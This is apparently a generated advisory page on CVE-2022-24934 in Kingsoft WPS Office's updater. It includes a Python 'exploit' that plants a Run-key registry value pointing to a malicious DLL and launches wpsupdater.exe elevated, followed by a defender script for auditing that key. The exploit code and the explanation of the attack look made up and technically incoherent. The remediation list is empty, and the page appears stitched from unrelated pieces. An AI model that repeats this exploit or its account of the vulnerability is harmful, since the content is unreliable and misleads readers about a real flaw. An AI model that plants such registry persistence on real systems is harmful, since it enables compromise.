A critical vulnerability (CVE-2022-24934) has been discovered in Kingsoft WPS Office, specifically affecting the wpsupdater.exe component in versions through 11.2.0.10382. This vulnerability allows remote attackers to execute arbitrary code on the target machine by altering the HKEY_CURRENT_USER registry settings.

I. Overview

Kingsoft WPS Office is a powerful suite of office productivity tools used worldwide. The software provides a set of applications for creating and editing documents, spreadsheets, and presentations, similar to Microsoft Office.

The issue arises from the wpsupdater.exe component, which is responsible for managing updates within the WPS Office suite. Remote attackers can exploit this vulnerability by modifying the HKEY_CURRENT_USER registry keys, enabling them to execute malicious code on the affected system.

II. Detailed Exploit Information

A remote attacker can exploit this vulnerability by crafting a malicious registry key with a specific payload and sending it to the target system. This key modifies the HKEY_CURRENT_USER settings, allowing arbitrary code execution.

Here's a code snippet that demonstrates this exploit:

import os
import ctypes

def create_reg_key(key, value):
    try:
        os.system("reg add " + key + " /v " + value + " /t REG_SZ /d \"malicious.dll\" /f")
    except WindowsError:
        pass

def main():
    key_path = "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"
    key_value = "UpdaterPath"

    create_reg_key(key_path, key_value)
    ctypes.windll.shell32.ShellExecuteA(None, "runas", "wpsupdater.exe", key_path, None, 1)

if __name__ == "__main__":
    main()

This Python script creates a malicious registry key and sets the "UpdaterPath" value to a malicious DLL file (malicious.dll). It then triggers the wpsupdater.exe component to access the modified key, resulting in arbitrary code execution.
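From the defender's side, the registry change made by the snippet above can be checked for on a host. The following is an added example, not code from the original page or from Kingsoft: it audits the text printed by `reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"` and flags values like the one the snippet writes. The function names, the heuristics and the sample output are assumptions constructed for illustration.

```python
import re

# Key and value name taken from the snippet above.
RUN_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"
PAGE_VALUE_NAME = "UpdaterPath"

# `reg query` prints each value as: 4 spaces, name, 4 spaces, type, 4 spaces, data.
VALUE_LINE = re.compile(r"^ {4}(?P<name>.+?) {4}(?P<type>REG_[A-Z_]+) {4}(?P<data>.*)$")

def first_token(data):
    """Return the program part of a command line, honouring double quotes."""
    data = data.strip()
    if data.startswith('"'):
        return data[1:].split('"', 1)[0]
    return data.split(" ", 1)[0]

def audit_run_key(reg_query_output):
    """Return (name, data, reasons) for each value that deserves a look."""
    findings = []
    for line in reg_query_output.splitlines():
        m = VALUE_LINE.match(line)
        if not m:
            continue  # key header or blank line
        name, data = m["name"], m["data"]
        program = first_token(data)
        reasons = []
        if name.lower() == PAGE_VALUE_NAME.lower():
            reasons.append("value name used in the snippet above")
        if program.lower().endswith(".dll"):
            reasons.append("autorun target is a DLL")
        # Hypothetical heuristic: drive letter, UNC path or %VAR% prefix counts as absolute.
        if not re.match(r"^([A-Za-z]:\\|\\\\|%)", program):
            reasons.append("target is not an absolute path")
        if reasons:
            findings.append((name, data, reasons))
    return findings

# Constructed sample of `reg query` output; not captured from a real host.
SAMPLE = "\n".join([
    "",
    RUN_KEY,
    r'    OneDrive    REG_SZ    "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    r"    UpdaterPath    REG_SZ    malicious.dll",
    r"    Notes Helper    REG_SZ    %LOCALAPPDATA%\Notes\helper.exe",
    "",
])

if __name__ == "__main__":
    for name, data, reasons in audit_run_key(SAMPLE):
        print(f"{name!r} -> {data!r}: {'; '.join(reasons)}")
```

A finding is a prompt for review rather than proof of compromise, since legitimate software also registers autorun entries under this key.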

III. Remediation

As of now, there is no official patch from Kingsoft for this vulnerability. However, users can implement the following steps to mitigate potential attacks:

IV. Conclusion

This vulnerability (CVE-2022-24934) presents a significant risk to users of Kingsoft WPS Office through 11.2.0.10382. Because it lets malicious actors execute arbitrary code, it is crucial for users to implement proper protection mechanisms and stay vigilant against possible threats.

As Kingsoft releases patches and fixes for future versions, users should ensure their software is always up-to-date to minimize exposure to vulnerabilities.

Timeline

Published on: 03/23/2022 22:15:00 UTC
Last modified on: 03/31/2022 16:52:00 UTC